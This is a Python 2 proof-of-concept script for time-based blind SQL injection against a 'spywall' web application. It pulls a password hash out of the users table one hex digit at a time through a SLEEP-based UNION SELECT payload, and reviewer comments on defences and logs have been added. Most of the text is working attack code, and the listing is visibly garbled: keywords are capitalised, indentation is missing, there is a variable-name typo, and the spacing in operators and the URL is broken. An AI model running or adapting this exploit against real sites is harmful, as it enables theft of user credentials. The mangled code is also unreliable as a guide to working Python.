#! /Usr/bin/python
# @ _ Kc57
# Time-based blind SQL injection proof of concept.
# Dumps the first available password hash from the users table of spywall_db.
Import urllib
Import time
From time import sleep
# Delay, in seconds, that is substituted into the SLEEP() call of the
# injected query built in check_char.
# NOTE(review): the literal reads '2. 5'; the whole listing is whitespace- and
# case-mangled, so this is presumably '2.5' in the original script. TODO confirm.
Timing = '2. 5'
# Running count of HTTP requests sent; check_char adds one per call and the
# total is printed at the end of the run.
Checks = 0
# check_char(I, pos): send one request that tests a single candidate value
# against a single character of the stored hash, and return how long it took.
#   I   - candidate value; check_pos passes the integers 0..15, one per hex digit.
#   pos - character position handed to MID() in the injected query.
# Returns the elapsed wall-clock time of the request, in seconds.
# Written for Python 2 (urllib.urlopen here, print statements elsewhere).
# NOTE(review): keywords are capitalised and indentation is missing throughout
# this listing, which looks like extraction damage; the code lines are left
# exactly as published.
Def check_char (I, pos ):
# NOTE(review): `timimg` is spelled differently from the `timing` name read in
# the URL line below.
Global timimg
Global checks
# Count the request that is about to be sent.
Checks + = 1
# The Groupid query parameter of deptUploads_data.php carries the payload: a
# UNION SELECT whose IF() compares the candidate with
# CONV(MID(password, pos, 1), 16, 10) and calls SLEEP(timing) only on a match,
# so the response delay is the only signal that comes back.
# Defender view: a payload of this shape only works if Groupid reaches the SQL
# statement unescaped (the server code is not shown here), so the fix is to
# bind it as a query parameter or cast it to an integer. In access logs the
# traffic appears as Groupid values containing "union select" and "SLEEP(".
Url = 'https: // www.2cto.com/spywall/destdes/deptUploads_data.php? Groupid = 1 union select 1, 2, IF (% s = conv (mid (select password from users), % s, 1), 16, 10), SLEEP (% s ), null); -- '% (I, pos, timing)
# Time the whole round trip; the figure includes network latency as well as
# any SLEEP() executed by the database.
Start = time. time ()
# The response body is discarded; only the duration is used.
Urllib. urlopen (url)
End = time. time ()
Howlong = end-start
Return howlong
# check_pos(pos): recover the hex digit at position pos by trying all 16 values.
# Calls check_char for m = 0..15, prints each measured duration, and returns
# the digit (hex(m) without its "0x" prefix) of the first candidate whose
# request took longer than 2 seconds.
# NOTE(review): the 2-second threshold is hard-coded here rather than derived
# from the module-level delay value.
# NOTE(review): if no candidate exceeds the threshold the function ends without
# a return statement, so it yields None and the string concatenation in the
# caller would fail.
Def check_pos (pos ):
For m in range (0, 16 ):
Output = check_char (m, pos)
Print "[*] Character % s-Took % s seconds" % (hex (m) [2:], output)
# A slow response means the SLEEP() branch ran, i.e. the candidate matched.
If output> 2:
Return hex (m) [2:]
# Main run: rebuild a 32-character hex string one position at a time.
# range(1, 33) yields positions 1..32, the length of an MD5 digest written in
# hex (the accumulator is named md5).
Md5 =''
Start = time. time ()
For y in range (1, 33 ):
Print "Checking position % s" % (y)
Md5 + = check_pos (y)
# Prints the value recovered so far.
# NOTE(review): indentation is lost in this listing, so whether this line sits
# inside the loop cannot be told from here.
Print md5
End = time. time ()
Howlong = end-start
# Summary: recovered value, number of requests sent, total elapsed seconds.
# At most 16 requests are made per position, so a full run is at most
# 16 * 32 = 512 requests to the same endpoint. That burst, with a subset of
# responses delayed by roughly the SLEEP value, is the pattern to look for in
# web-server and database logs.
Print "1st hash: % s" % (md5)
Print "Found in % s queries" % (checks)
Print "Found in % s" % (howlong)